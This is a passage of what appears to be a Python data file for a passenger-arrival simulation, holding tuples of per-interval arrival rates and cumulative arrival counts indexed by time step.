(16.597026731078905, 15.51879283154122, 15.97278148148148, 19.168453623188405, 17.99825708061002, 9.998347325102882, 11.744429090154583, 11.720158024691358, 18.770876543209877, 11.150090225127087, 12.975780542264753, 14.76355035737492, 16.198217592592595), # 69
(16.59181726009423, 15.463347935749368, 15.954029492455417, 19.14573939881911, 17.995198902606308, 9.995458009449779, 11.706656215298192, 11.667123914037496, 18.750244627343395, 11.116671239140375, 12.957038218441728, 14.738276418068494, 16.195091735253776), # 70
(16.584111457028687, 15.406896269746449, 15.93480013717421, 19.12171760601181, 17.990668926006617, 9.991193293705228, 11.668322655262381, 11.61426538637403, 18.728675537265662, 11.083136574948224, 12.936299793254179, 14.712244699540344, 16.190463820301783), # 71
(16.573982608695655, 15.349470967741935, 15.915099999999999, 19.096421739130435, 17.98470588235294, 9.985600000000002, 11.62944537815126, 11.5616, 18.706200000000003, 11.04948705882353, 12.913634449760767, 14.685473684210528, 16.184375), # 72
(16.561504001908514, 15.291105163945307, 15.894935665294923, 19.069885292538917, 17.977348503187283, 9.978724950464867, 11.590041352068948, 11.50914531321445, 18.682848742569732, 11.01572351703919, 12.889111371020142, 14.65798185449907, 16.1768664266118), # 73
(16.546748923480646, 15.231831992566043, 15.874313717421124, 19.04214176060118, 17.96863552005164, 9.970614967230606, 11.550127545119556, 11.456918884316416, 18.658652491998172, 10.9818467758681, 12.86279974009097, 14.629787692826028, 16.167979252400553), # 74
(16.52979066022544, 15.171684587813619, 15.85324074074074, 19.01322463768116, 17.95860566448802, 9.961316872427986, 11.509720925407201, 11.404938271604939, 18.63364197530864, 10.947857661583152, 12.834768740031897, 14.600909681611435, 16.157754629629633), # 75
(16.510702498956285, 15.11069608389752, 15.831723319615913, 18.98316741814278, 17.94729766803841, 9.950877488187778, 11.468838461035993, 11.353221033379059, 18.607847919524463, 10.913757000457247, 12.805087553901586, 14.571366303275333, 16.146233710562413), # 76
(16.48955772648655, 15.048899615027217, 15.809768038408777, 18.95200359634997, 17.934750262244815, 9.939343636640757, 11.427497120110047, 11.301784727937816, 18.581301051668955, 10.87954561876328, 12.7738253647587, 14.54117604023777, 16.13345764746228), # 77
(16.46642962962963, 14.98632831541219, 15.787381481481482, 18.919766666666668, 17.92100217864924, 9.926762139917695, 11.38571387073348, 11.250646913580248, 18.55403209876543, 10.845224342774147, 12.741051355661883, 14.510357374918781, 16.119467592592596), # 78
(16.441391495198904, 14.923015319261916, 15.76457023319616, 18.88649012345679, 17.906092148793675, 9.913179820149367, 11.343505681010402, 11.199825148605397, 18.52607178783722, 10.810793998762742, 12.706834709669796, 14.478928789738408, 16.104304698216733), # 79
(16.414516610007755, 14.858993760785877, 15.74134087791495, 18.852207461084273, 17.890058904220126, 9.898643499466544, 11.30088951904493, 11.149336991312301, 18.497450845907636, 10.776255413001962, 12.671244609841102, 14.446908767116696, 16.08801011659808), # 80
(16.385878260869568, 14.79429677419355, 15.7177, 18.816952173913048, 17.872941176470587, 9.8832, 11.257882352941177, 11.099200000000002, 18.4682, 10.741609411764706, 12.63435023923445, 14.414315789473685, 16.070625), # 81
(16.355549734597723, 14.728957493694413, 15.693654183813445, 18.780757756307032, 17.854777697087066, 9.866896143880508, 11.214501150803258, 11.049431732967536, 18.43834997713763, 10.706856821323866, 12.596220780908501, 14.381168339229419, 16.052190500685874), # 82
(16.323604318005607, 14.663009053497943, 15.669210013717422, 18.743657702630166, 17.835607197611555, 9.849778753238837, 11.170762880735285, 11.000049748513947, 18.40793150434385, 10.671998467952339, 12.55692541792191, 14.34748489880394, 16.03274777091907), # 83
(16.290115297906603, 14.59648458781362, 15.644374074074074, 18.70568550724638, 17.815468409586057, 9.831894650205761, 11.126684510841374, 10.95107160493827, 18.376975308641974, 10.637035177923023, 12.516533333333333, 14.313283950617285, 16.012337962962963), # 84
(16.255155961114095, 14.529417230850923, 15.61915294924554, 18.666874664519593, 17.794400064552573, 9.813290656912057, 11.08228300922564, 10.902514860539554, 18.345512117055325, 10.60196777750881, 12.47511371020143, 14.2785839770895, 15.991002229080934), # 85
(16.21879959444146, 14.46184011681933, 15.593553223593966, 18.627258668813745, 17.772440894053094, 9.794013595488494, 11.037575343992193, 10.854397073616827, 18.313572656607228, 10.566797092982599, 12.432735731584856, 14.24340346064063, 15.968781721536352), # 86
(16.18111948470209, 14.393786379928315, 15.567581481481481, 18.586871014492754, 17.749629629629634, 9.774110288065843, 10.99257848324515, 10.806735802469136, 18.28118765432099, 10.531523950617284, 12.389468580542264, 14.207760883690709, 15.945717592592594), # 87
(16.142188918709373, 14.325289154387361, 15.541244307270233, 18.54574519592056, 17.726005002824177, 9.753627556774882, 10.947309395088626, 10.75954860539552, 18.248387837219937, 10.496149176685762, 12.345381440132318, 14.171674728659784, 15.921850994513035), # 88
(16.102081183276677, 14.256381574405948, 15.51454828532236, 18.503914707461085, 17.701605745178732, 9.732612223746381, 10.901785047626733, 10.712853040695016, 18.21520393232739, 10.460673597460932, 12.30054349341367, 14.135163477967897, 15.897223079561043), # 89
(16.06086956521739, 14.187096774193549, 15.4875, 18.461413043478263, 17.676470588235297, 9.711111111111112, 10.856022408963586, 10.666666666666666, 18.18166666666667, 10.425098039215687, 12.255023923444977, 14.098245614035088, 15.871875000000001), # 90
(16.0186273513449, 14.117467887959643, 15.460106035665294, 18.41827369833602, 17.650638263535864, 9.689171040999847, 10.810038447203299, 10.621007041609511, 18.14780676726109, 10.389423328222922, 12.208891913284896, 14.060939619281399, 15.845847908093276), # 91
(15.975427828472597, 14.047528049913716, 15.432372976680384, 18.374530166398284, 17.624147502622446, 9.666838835543363, 10.763850130449988, 10.57589172382259, 18.113654961133975, 10.353650290755535, 12.162216645992086, 14.023263976126877, 15.819182956104251), # 92
(15.931344283413848, 13.977310394265235, 15.404307407407408, 18.33021594202899, 17.597037037037037, 9.644161316872427, 10.717474426807762, 10.53133827160494, 18.079241975308644, 10.31777975308642, 12.1150673046252, 13.985237166991553, 15.791921296296294), # 93
(15.886450002982048, 13.906848055223684, 15.375915912208507, 18.285364519592058, 17.569345598321632, 9.621185307117818, 10.670928304380737, 10.487364243255604, 18.044598536808415, 10.281812541488476, 12.067513072242896, 13.946877674295479, 15.764104080932785), # 94
(15.840818273990577, 13.836174166998541, 15.347205075445817, 18.240009393451423, 17.541111918018238, 9.597957628410304, 10.62422873127303, 10.443987197073618, 18.00975537265661, 10.245749482234594, 12.019623131903835, 13.908203980458689, 15.735772462277092), # 95
(15.79452238325282, 13.765321863799286, 15.318181481481483, 18.194184057971015, 17.512374727668846, 9.574525102880658, 10.577392675588754, 10.401224691358026, 17.974743209876543, 10.209591401597677, 11.971466666666668, 13.869234567901238, 15.706967592592594), # 96
(15.747635617582157, 13.694324279835394, 15.28885171467764, 18.14792200751476, 17.483172758815464, 9.550934552659655, 10.530437105432021, 10.359094284407867, 17.939592775491544, 10.173339125850616, 11.923112859590052, 13.829987919043152, 15.677730624142663), # 97
(15.700231263791975, 13.623214549316343, 15.259222359396432, 18.101256736446594, 17.453544743000084, 9.52723279987807, 10.48337898890695, 10.317613534522177, 17.904334796524918, 10.136993481266307, 11.87463089373265, 13.790482516304477, 15.648102709190674), # 98
(15.652382608695653, 13.552025806451613, 15.229300000000002, 18.054221739130437, 17.423529411764708, 9.503466666666666, 10.43623529411765, 10.276800000000001, 17.869, 10.100555294117648, 11.826089952153112, 13.750736842105264, 15.618125000000001), # 99
(15.60416293910658, 13.480791185450682, 15.19909122085048, 18.00685050993022, 17.393165496651335, 9.479682975156226, 10.389022989168232, 10.236671239140376, 17.833619112940102, 10.064025390677534, 11.777559217910095, 13.710769378865548, 15.58783864883402), # 100
(15.555645541838135, 13.409543820523034, 15.168602606310015, 17.959176543209878, 17.36249172920197, 9.455928547477518, 10.34175904216282, 10.19724481024234, 17.798222862368544, 10.027404597218862, 11.72910787406226, 13.670598609005365, 15.557284807956103), # 101
(15.506903703703706, 13.338316845878138, 15.13784074074074, 17.911233333333335, 17.331546840958605, 9.432250205761319, 10.294460421205521, 10.15853827160494, 17.762841975308643, 9.990693740014526, 11.680805103668263, 13.63024301494477, 15.526504629629631), # 102
(15.458010711516671, 13.267143395725476, 15.1068122085048, 17.86305437466452, 17.300369563463246, 9.408694772138395, 10.247144094400449, 10.120569181527207, 17.72750717878372, 9.953893645337423, 11.632720089786758, 13.589721079103796, 15.495539266117968), # 103
(15.409039852090416, 13.196056604274526, 15.075523593964334, 17.814673161567367, 17.268998628257886, 9.385309068739522, 10.199827029851722, 10.083355098308186, 17.692249199817102, 9.91700513946045, 11.584922015476401, 13.549051283902486, 15.464429869684501), # 104
(15.360064412238325, 13.125089605734766, 15.043981481481481, 17.766123188405796, 17.237472766884533, 9.362139917695474, 10.152526195663453, 10.046913580246915, 17.6570987654321, 9.880029048656501, 11.537480063795854, 13.508252111760886, 15.433217592592593), # 105
(15.311157678773782, 13.054275534315678, 15.012192455418381, 17.717437949543747, 17.205830710885177, 9.339234141137021, 10.105258559939752, 10.011262185642433, 17.622086602652033, 9.842966199198472, 11.490463417803769, 13.46734204509903, 15.401943587105624), # 106
(15.26239293851017, 12.983647524226738, 14.980163100137176, 17.66865093934514, 17.174111191801824, 9.31663856119494, 10.058041090784739, 9.976418472793783, 17.58724343850023, 9.805817417359263, 11.443941260558804, 13.426339566336967, 15.370649005486968), # 107
(15.21384347826087, 12.913238709677422, 14.947900000000002, 17.619795652173917, 17.14235294117647, 9.294400000000001, 10.010890756302521, 9.942400000000001, 17.5526, 9.768583529411766, 11.397982775119617, 13.38526315789474, 15.339375000000002), # 108
(15.16558258483927, 12.843082224877207, 14.915409739369, 17.570905582393987, 17.11059469055112, 9.272565279682976, 9.96382452459722, 9.90922432556013, 17.518187014174668, 9.731265361628877, 11.352657144544864, 13.34413130219238, 15.308162722908094), # 109
(15.117683545058746, 12.77321120403558, 14.882698902606315, 17.522014224369297, 17.078875171467768, 9.251181222374639, 9.916859363772943, 9.876909007773206, 17.484035208047555, 9.693863740283494, 11.308033551893201, 13.302962481649942, 15.277053326474624), # 110
(15.07021964573269, 12.703658781362009, 14.849774074074077, 17.47315507246377, 17.047233115468412, 9.230294650205762, 9.87001224193381, 9.845471604938272, 17.450175308641978, 9.656379491648512, 11.264181180223286, 13.261775178687461, 15.246087962962964), # 111
(15.02326417367448, 12.634458091065975, 14.816641838134434, 17.42436162104133, 17.015707254095055, 9.209952385307119, 9.823300127183934, 9.814929675354367, 17.41663804298125, 9.618813441996826, 11.221169212593775, 13.220587875724977, 15.215307784636488), # 112
(14.976806757924871, 12.565757790057525, 14.78338852520331, 17.375734211987265, 16.98428108827793, 9.190191630743222, 9.776841541850832, 9.78536411004897, 17.383540498013794, 9.581287578580367, 11.179078249844586, 13.179508698407085, 15.184710241349155), # 113
(14.930369436640104, 12.498235493640857, 14.75047308003459, 17.327663074043738, 16.952629367306123, 9.170967373647843, 9.731229133456928, 9.757138015208191, 17.351390457140898, 9.544504268660452, 11.137990939381115, 13.13905947538076, 15.154040662656056), # 114
(14.883815844806392, 12.431915517892875, 14.717915092331708, 17.280135208290847, 16.920652284621763, 9.152229619998023, 9.6864954403065, 9.730244246845935, 17.320199965870064, 9.508520524780923, 11.09784721828335, 13.099260132094162, 15.123210610656603), # 115
(14.837087797180216, 12.366701250066724, 14.685651503974197, 17.233065840426246, 16.888301642214046, 9.133934203659356, 9.64256770804463, 9.70460850063839, 17.28989014276453, 9.473269373519276, 11.05856949003437, 13.060037115979753, 15.092171615609425), # 116
(14.790127108518035, 12.302496077415555, 14.653619256841578, 17.18637019614759, 16.855529242072176, 9.116036958497425, 9.599373182316404, 9.680156472261736, 17.260382106387524, 9.438683841453006, 11.020080158117253, 13.021316874470001, 15.06087520777316), # 117
(14.742875593576338, 12.239203387192518, 14.621755292813388, 17.139963501152533, 16.82228688618535, 9.098493718377823, 9.556839108766905, 9.656813857392155, 17.231596975302296, 9.404696955159615, 10.98230162601508, 12.98302585499736, 15.02927291740644), # 118
(14.695275067111588, 12.176726566650768, 14.589996553769158, 17.09376098113873, 16.788526376542755, 9.081260317166132, 9.51489273304121, 9.634506351705832, 17.20345586807207, 9.371241741216595, 10.945156297210925, 12.945090504994296, 14.997316274767892), # 119
(14.647267343880259, 12.114969003043454, 14.55827998158842, 17.04767786180383, 16.754199515133596, 9.064292588727945, 9.473461300784406, 9.613159650878949, 17.175879903260093, 9.338251226201448, 10.908566575187866, 12.907437271893276, 14.964956810116156), # 120
(14.59879423863883, 12.053834083623727, 14.5265425181507, 17.001629368845496, 16.71925810394707, 9.047546366928849, 9.432472057641569, 9.592699450587691, 17.148790199429598, 9.305658436691674, 10.872454863428986, 12.869992603126756, 14.932146053709857), # 121
(14.549797566143766, 11.993225195644738, 14.494721105335538, 16.95553072796137, 16.683653944972374, 9.03097748563443, 9.391852249257788, 9.573051446508238, 17.122107875143822, 9.273396399264763, 10.836743565417363, 12.832682946127202, 14.898835535807633), # 122
(14.50021914115155, 11.933045726359639, 14.462752685022458, 16.90929716484911, 16.647338840198707, 9.01454177871028, 9.351529121278142, 9.554141334316773, 17.095754048966008, 9.24139814049822, 10.801355084636072, 12.795434748327075, 14.864976786668116), # 123
(14.450000778418648, 11.87319906302158, 14.430574199090993, 16.86284390520638, 16.61026459161526, 8.998195080021983, 9.311429919347711, 9.535894809689482, 17.069649839459384, 9.209596686969538, 10.766211824568192, 12.758174457158841, 14.830521336549939), # 124
(14.399084292701534, 11.813588592883713, 14.398122589420678, 16.816086174730817, 16.572383001211236, 8.98189322343513, 9.271481889111582, 9.518237568302546, 17.04371636518719, 9.177925065256215, 10.731236188696803, 12.720828520054958, 14.795420715711726), # 125
(14.347411498756685, 11.754117703199192, 14.365334797891038, 16.768939199120087, 16.53364587097583, 8.965592042815308, 9.231612276214832, 9.501095305832148, 17.017874744712667, 9.146316301935748, 10.696350580504982, 12.683323384447895, 14.759626454412127), # 126
(14.294924211340579, 11.69468978122116, 14.332147766381608, 16.72131820407184, 16.494005002898238, 8.949247372028104, 9.19174832630255, 9.484393717954474, 16.99204609659905, 9.114703423585638, 10.661477403475807, 12.645585497770107, 14.723090082909758), # 127
(14.241564245209673, 11.635208214202777, 14.29849843677192, 16.67313841528373, 16.453412198967666, 8.93281504493911, 9.151817285019812, 9.4680585003457, 16.966151539409577, 9.083019456783381, 10.626539061092359, 12.607541307454062, 14.68576313146326), # 128
(14.187273415120451, 11.575576389397186, 14.264323750941504, 16.624315058453412, 16.4118192611733, 8.916250895413912, 9.111746398011702, 9.452015348682016, 16.94011219170748, 9.051197428106473, 10.591457956837715, 12.569117260932218, 14.647597130331262), # 129
(14.131993535829388, 11.515697694057547, 14.229560650769887, 16.57476335927854, 16.36917799150434, 8.899510757318094, 9.0714629109233, 9.4361899586396, 16.913849172056, 9.019170364132412, 10.556156494194951, 12.530239805637045, 14.608543609772397), # 130
(14.07566642209295, 11.455475515437003, 14.19414607813661, 16.524398543456762, 16.32544019194999, 8.88255046451725, 9.030894069399695, 9.42050802589464, 16.887283599018378, 8.986871291438696, 10.52055707664715, 12.490835389000999, 14.568554100045299), # 131
(14.018233888667616, 11.39481324078871, 14.158016974921194, 16.47313583668574, 16.280557664499447, 8.865325850876964, 8.98996711908596, 9.404895246123317, 16.860336591157846, 8.954233236602823, 10.484582107677383, 12.450830458456547, 14.527580131408602), # 132
(13.959637750309861, 11.333614257365817, 14.121110283003175, 16.420890464663124, 16.2344822111419, 8.847792750262826, 8.948609305627183, 9.389277315001811, 16.832929267037642, 8.921189226202292, 10.448153990768738, 12.410151461436149, 14.485573234120938), # 133
(13.899819821776152, 11.271781952421478, 14.083362944262086, 16.367577653086567, 16.18716563386655, 8.829906996540425, 8.906747874668445, 9.37357992820631, 16.804982745221007, 8.887672286814597, 10.411195129404286, 12.368724845372267, 14.442484938440934), # 134
(13.838721917822966, 11.209219713208839, 14.044711900577454, 16.313112627653727, 16.138559734662593, 8.811624423575347, 8.86431007185483, 9.357728781412993, 16.77641814427117, 8.853615445017242, 10.373627927067108, 12.326477057697364, 14.398266774627231), # 135
(13.776285853206776, 11.145830926981056, 14.005094093828815, 16.25741061406225, 16.08861631551923, 8.792900865233184, 8.821223142831416, 9.341649570298044, 16.74715658275137, 8.818951727387716, 10.335374787240283, 12.283334545843907, 14.352870272938459), # 136
(13.712453442684055, 11.081518980991277, 13.964446465895698, 16.200386838009802, 16.037287178425654, 8.773692155379518, 8.77741433324329, 9.325267990537647, 16.717119179224852, 8.783614160503523, 10.296358113406889, 12.239223757244352, 14.306246963633242), # 137
(13.647166501011277, 11.016187262492654, 13.922705958657628, 16.141956525194022, 15.98452412537107, 8.753954127879942, 8.732810888735527, 9.308509737807984, 16.68622705225485, 8.747535770942156, 10.256500309050004, 12.194071139331164, 14.258348376970226), # 138
(13.58036684294491, 10.949739158738339, 13.879809513994145, 16.082034901312575, 15.930278958344665, 8.733642616600042, 8.687340054953216, 9.29130050778524, 16.654401320404595, 8.710649585281116, 10.215723777652705, 12.14780313953681, 14.20912604320803), # 139
(13.511996283241437, 10.88207805698148, 13.83569407378478, 16.020537192063113, 15.874503479335647, 8.712713455405407, 8.640929077541434, 9.273565996145594, 16.62156310223733, 8.672888630097898, 10.17395092269807, 12.100346205293746, 14.158531492605304), # 140
(13.44199663665733, 10.813107344475235, 13.790296579909057, 15.957378623143285, 15.817149490333206, 8.691122478161624, 8.593505202145272, 9.255231898565233, 16.587633516316288, 8.634185931970002, 10.131104147669182, 12.05162678403444, 14.106516255420662), # 141
(13.37030971794905, 10.742730408472745, 13.743553974246513, 15.892474420250753, 15.75816879332654, 8.668825518734284, 8.544995674409803, 9.236223910720339, 16.552533681204707, 8.594474517474925, 10.087105856049115, 12.001571323191351, 14.053031861912746), # 142
(13.29687734187308, 10.67085063622717, 13.695403198676681, 15.82573980908316, 15.697513190304846, 8.64577841098897, 8.49532773998011, 9.21646772828709, 16.516184715465837, 8.553687413190165, 10.04187845132095, 11.950106270196944, 13.998029842340188), # 143
(13.221641323185896, 10.597371414991658, 13.645781195079085, 15.757090015338171, 15.635134483257326, 8.621936988791274, 8.444428644501278, 9.195889046941678, 16.478507737662895, 8.511757645693216, 9.995344336967761, 11.897158072483679, 13.941461726961624), # 144
(13.144543476643964, 10.52219613201936, 13.594624905333262, 15.686440264713433, 15.570984474173173, 8.597257086006785, 8.39222563361839, 9.174413562360282, 16.439423866359128, 8.46861824156158, 9.947425916472632, 11.842653177484022, 13.88327904603568), # 145
(13.065525617003761, 10.445228174563427, 13.541871271318747, 15.613705782906601, 15.505014965041589, 8.57169453650109, 8.338645952976528, 9.151966970219084, 16.39885422011777, 8.424202227372753, 9.898045593318638, 11.786518032630433, 13.82343332982099), # 146
(12.98452955902176, 10.366370929877009, 13.487457234915055, 15.538801795615328, 15.437177757851764, 8.545205174139772, 8.28361684822077, 9.128474966194265, 16.356719917502065, 8.378442629704233, 9.847125770988859, 11.728679085355378, 13.761876108576189), # 147
(12.901497117454435, 10.285527785213262, 13.431319738001733, 15.461643528537275, 15.367424654592899, 8.517744832788429, 8.227065564996202, 9.103863245962012, 16.312942077075245, 8.331272475133515, 9.794588852966372, 11.669062783091313, 13.698558912559907), # 148
(12.81637010705826, 10.20260212782533, 13.37339572245831, 15.382146207370084, 15.295707457254194, 8.48926934631264, 8.168919348947906, 9.078057505198506, 16.26744181740054, 8.282624790238101, 9.740357242734255, 11.607595573270707, 13.63343327203078), # 149
(12.729090342589704, 10.117497344966367, 13.313622130164312, 15.30022505781142, 15.221977967824841, 8.459734548577998, 8.109105445720962, 9.05098343957993, 16.220140257041205, 8.232432601595482, 9.684353343775589, 11.544203903326022, 13.566450717247434), # 150
(12.63959963880524, 10.030116823889527, 13.251935902999268, 15.215795305558927, 15.146187988294043, 8.429096273450089, 8.047551100960453, 9.02256674478247, 16.170958514560464, 8.180628935783165, 9.626499559573448, 11.478814220689715, 13.49756277846851), # 151
(12.54783981046135, 9.940363951847957, 13.188273982842723, 15.128772176310271, 15.06828932065099, 8.397310354794502, 7.984183560311464, 8.992733116482306, 16.119817708521552, 8.12714681937864, 9.566718293610915, 11.411352972794255, 13.426720985952636), # 152
(12.453752672314497, 9.848142116094811, 13.12257331157419, 15.039070895763093, 14.988233766884889, 8.364332626476825, 7.918930069419071, 8.96140825035562, 16.06663895748772, 8.071919278959406, 9.504931949371066, 11.341746607072103, 13.353876869958444), # 153
(12.357280039121166, 9.75335470388324, 13.054770831073213, 14.946606689615056, 14.905973128984929, 8.330118922362647, 7.851717873928365, 8.928517842078596, 16.011343380022186, 8.014879341102965, 9.44106293033698, 11.26992157095572, 13.278981960744572), # 154
(12.258363725637818, 9.655905102466392, 12.984803483219322, 14.851294783563805, 14.821459208940315, 8.294625076317555, 7.782474219484418, 8.893987587327418, 15.953852094688205, 7.955960032386807, 9.375033639991733, 11.195804311877572, 13.201987788569642), # 155
(12.15694554662093, 9.555696699097421, 12.912608209892042, 14.753050403307, 14.734643808740238, 8.257806922207138, 7.71112635173232, 8.85774318177827, 15.894086220049003, 7.8950943793884365, 9.306766481818407, 11.119321277270117, 13.122845883692296), # 156
(12.05296731682698, 9.452632881029478, 12.838121952970909, 14.6517887745423, 14.645478730373895, 8.219620293896982, 7.637601516317151, 8.819710321107332, 15.831966874667822, 7.832215408685347, 9.236183859300079, 11.04039891456582, 13.041507776371162), # 157
(11.943489514248384, 9.344724993235614, 12.75774712624377, 14.54363133064199, 14.549889769393596, 8.177639162107376, 7.560170753484572, 8.777275123758995, 15.762659346558557, 7.76538546606583, 9.160953204062308, 10.956159302710944, 12.954377375064553), # 158
(11.811658827165445, 9.220904511359164, 12.65078050944478, 14.406363454061527, 14.424306095650605, 8.117903436811366, 7.469140421417146, 8.715541652423012, 15.658283617955432, 7.683649590557993, 9.06786709699039, 10.850180037892974, 12.840684235072311), # 159
(11.655795351846896, 9.080154765665142, 12.515073532729422, 14.237724016654177, 14.266272210154874, 8.038946073676295, 7.363589997414055, 8.632958703243755, 15.515880363565842, 7.58592904298063, 8.955615213775264, 10.720803118220555, 12.69827297422973), # 160
(11.477155287337537, 8.92339338892875, 12.352075155056495, 14.039316006010765, 14.077428998851381, 7.941723586512502, 7.244290313611002, 8.530560852975649, 15.337327627198428, 7.473053109073501, 8.825186647359532, 10.569227950252113, 12.528598471710556), # 161
(11.27699483268217, 8.751538013925183, 12.163234335384793, 13.812742409722123, 13.859417347685127, 7.827192489130329, 7.112012202143695, 8.409382678373124, 15.12450345266182, 7.3458510745763705, 8.677570490685794, 10.39665394054607, 12.333115606688533), # 162
(11.056570186925597, 8.565506273429639, 11.950000032673124, 13.559606215379095, 13.613878142601102, 7.696309295340116, 6.967526495147841, 8.2704587561906, 14.87928588376465, 7.205152225229, 8.513755836696653, 10.204280495660853, 12.113279258337407), # 163
(10.817137549112616, 8.366215800217313, 11.713821205880283, 13.281510410572508, 13.342452269544303, 7.550030518952207, 6.811604024759146, 8.114823663182511, 14.603552964315558, 7.05178584677115, 8.334731778334714, 9.993307022154886, 11.870544305830926), # 164
(10.559953118288028, 8.154584227063411, 11.45614681396507, 12.980057982893204, 13.046780614459719, 7.389312673776939, 6.6450156231133155, 7.943511976103274, 14.299182738123168, 6.8865812249425815, 8.141487408542579, 9.764932926586592, 11.606365628342832), # 165
(10.286273093496636, 7.931529186743127, 11.178425815886285, 12.656851919932002, 12.728504063292343, 7.215112273624654, 6.468532122346058, 7.757558271707324, 13.968053248996117, 6.71036764548306, 7.935011820262847, 9.520357615514403, 11.322198105046873), # 166
(9.997353673783238, 7.6979683120316595, 10.882107170602728, 12.31349520927975, 12.389263501987168, 7.028385832305694, 6.28292435459308, 7.557997126749083, 13.61204254074304, 6.523974394132343, 7.716294106438124, 9.260780495496734, 11.019496615116793), # 167
(9.694451058192634, 7.454819235704206, 10.568639837073198, 11.951590838527274, 12.030699816489188, 6.830089863630398, 6.088963151990087, 7.345863117982976, 13.233028657172568, 6.328230756630195, 7.48632336001101, 8.987400973092019, 10.69971603772634), # 168
(9.378821445769624, 7.202999590535967, 10.239472774256495, 11.572741795265413, 11.654453892743392, 6.621180881409112, 5.887419346672787, 7.122190822163432, 12.832889642093342, 6.123966018716379, 7.24608867392411, 8.701418454858675, 10.364311252049257), # 169
(9.051721035559014, 6.94342700930214, 9.896054941111416, 11.178551067084992, 11.262166616694774, 6.402615399452171, 5.679063770776885, 6.888014816044876, 12.413503539313982, 5.912009466130653, 6.996579141120026, 8.404032347355134, 10.014737137259289), # 170
(8.7144060266056, 6.677019124777921, 9.539835296596765, 10.770621641576858, 10.85547887428833, 6.175349931569918, 5.464667256438089, 6.644369676381733, 11.976748392643131, 5.693190384612782, 6.738783854541357, 8.096442057139818, 9.652448572530185), # 171
(8.368132617954185, 6.4046935697385114, 9.172262799671339, 10.350556506331834, 10.436031551469046, 5.940340991572694, 5.245000635792105, 6.392289979928433, 11.524502245889417, 5.468338059902528, 6.473691907130711, 7.779846990771154, 9.278900437035686), # 172
(8.014157008649567, 6.127367976959108, 8.79478640929394, 9.919958648940762, 10.005465534181923, 5.69854509327084, 5.02083474097464, 6.132810303439398, 11.058643142861477, 5.238281777739651, 6.202292391830685, 7.45544655480756, 8.89554760994954), # 173
(7.6537353977365505, 5.845959979214909, 8.408855084423363, 9.480431056994465, 9.565421708371947, 5.450918750474696, 4.792940404121401, 5.866965223669057, 10.581049127367942, 5.003850823863915, 5.9255744015838845, 7.124440155807469, 8.503844970445494), # 174
(7.288123984259929, 5.561387209281111, 8.015917784018413, 9.033576718083788, 9.11754095998411, 5.198418476994606, 4.562088457368093, 5.595789317371834, 10.09359824321745, 4.765874484015079, 5.644527029332911, 6.788027200329303, 8.105247397697292), # 175
(6.91857896726451, 5.274567299932917, 7.617423467037885, 8.58099861979956, 8.663464174963408, 4.942000786640907, 4.329049732850424, 5.3203171613021585, 9.598168534218628, 4.525182043932907, 5.360139368020368, 6.447407094931487, 7.701209770878679), # 176
(6.546356545795092, 4.986417883945522, 7.214821092440582, 8.124299749732613, 8.204832239254838, 4.682622193223941, 4.094595062704101, 5.0415833322144525, 9.096638044180112, 4.282602789357159, 5.073400510588858, 6.103779246172446, 7.2931869691634), # 177
(6.172712918896475, 4.697856594094126, 6.809559619185302, 7.665083095473786, 7.743286038803382, 4.421239210554052, 3.859495279064828, 4.760622406863145, 8.590884816910537, 4.0389660060276, 4.78529954998098, 5.758343060610604, 6.882633871725203), # 178
(0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0), # 179
)
passenger_arriving_acc = (
(6, 7, 5, 12, 5, 4, 3, 0, 3, 0, 0, 1, 0, 12, 9, 9, 3, 5, 2, 3, 2, 3, 0, 1, 2, 0), # 0
(14, 19, 7, 14, 13, 7, 6, 1, 5, 2, 1, 1, 0, 26, 19, 16, 9, 10, 6, 7, 5, 9, 3, 3, 4, 0), # 1
(21, 30, 17, 22, 19, 9, 10, 5, 10, 3, 3, 2, 0, 36, 26, 22, 18, 17, 11, 10, 9, 13, 7, 3, 5, 0), # 2
(28, 36, 28, 37, 25, 13, 14, 10, 13, 5, 5, 4, 0, 46, 36, 27, 23, 29, 14, 17, 11, 15, 11, 3, 5, 0), # 3
(38, 49, 39, 46, 33, 19, 19, 12, 14, 7, 5, 4, 0, 55, 39, 29, 29, 37, 22, 22, 17, 19, 14, 7, 5, 0), # 4
(52, 59, 52, 54, 41, 24, 26, 16, 18, 8, 6, 6, 0, 64, 49, 36, 33, 47, 28, 24, 21, 22, 15, 8, 5, 0), # 5
(68, 66, 59, 62, 50, 31, 32, 17, 23, 9, 8, 7, 0, 72, 58, 43, 39, 51, 32, 28, 26, 27, 18, 9, 5, 0), # 6
(89, 89, 64, 74, 58, 37, 36, 22, 25, 10, 10, 8, 0, 82, 65, 46, 47, 61, 37, 38, 31, 31, 24, 11, 5, 0), # 7
(103, 105, 73, 87, 62, 42, 40, 27, 32, 12, 13, 8, 0, 100, 78, 54, 56, 71, 43, 40, 37, 34, 27, 13, 5, 0), # 8
(118, 123, 87, 100, 74, 49, 44, 33, 40, 13, 13, 8, 0, 116, 84, 67, 63, 74, 51, 44, 39, 42, 33, 14, 5, 0), # 9
(135, 138, 97, 112, 78, 51, 49, 38, 44, 19, 17, 10, 0, 129, 95, 73, 73, 85, 57, 53, 42, 48, 37, 18, 8, 0), # 10
(147, 151, 109, 127, 97, 57, 55, 45, 52, 21, 18, 10, 0, 152, 103, 83, 85, 97, 62, 58, 45, 51, 42, 18, 9, 0), # 11
(157, 170, 116, 137, 107, 62, 60, 52, 58, 24, 19, 10, 0, 166, 113, 94, 90, 113, 66, 65, 54, 54, 48, 20, 9, 0), # 12
(172, 181, 131, 144, 117, 66, 68, 57, 62, 26, 21, 11, 0, 177, 127, 102, 99, 121, 73, 72, 58, 61, 50, 21, 10, 0), # 13
(187, 189, 144, 162, 127, 72, 77, 63, 69, 28, 26, 12, 0, 187, 145, 111, 106, 132, 82, 79, 61, 68, 54, 23, 11, 0), # 14
(197, 208, 150, 176, 139, 80, 85, 76, 78, 31, 29, 15, 0, 199, 151, 120, 115, 142, 89, 89, 64, 74, 57, 23, 11, 0), # 15
(204, 230, 162, 188, 148, 84, 93, 76, 82, 36, 31, 17, 0, 217, 160, 137, 124, 156, 101, 94, 70, 82, 60, 26, 12, 0), # 16
(222, 235, 174, 203, 157, 86, 103, 80, 89, 38, 36, 17, 0, 232, 173, 151, 138, 172, 110, 106, 76, 84, 68, 27, 14, 0), # 17
(244, 250, 186, 219, 168, 96, 106, 84, 97, 43, 38, 19, 0, 243, 186, 164, 144, 188, 117, 116, 80, 86, 72, 29, 15, 0), # 18
